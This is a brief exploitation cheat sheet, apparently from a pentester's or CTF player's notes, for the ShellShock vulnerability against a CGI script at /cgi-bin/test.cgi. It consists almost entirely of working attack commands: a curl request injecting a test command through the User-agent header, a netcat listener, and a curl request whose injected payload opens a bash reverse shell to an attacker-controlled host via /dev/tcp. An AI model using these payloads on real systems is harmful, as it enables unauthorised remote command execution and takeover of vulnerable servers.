- This cve (ShellShock) allows us to inject commands to the
/cgi-bin/test.cgi
directory - Example of command:
curl -H "User-agent: () { :;}; echo; echo vulnerable" http://IP_HOST/cgi-bin/test.cgi
-
Get a reverse shell:
# On your machine start a listener
nc -nlvp PORT
# Then send a request for the shell
curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/IP_ATTACK/PORT 0>&1" http://IP_HOST/cgi-bin/test.cgi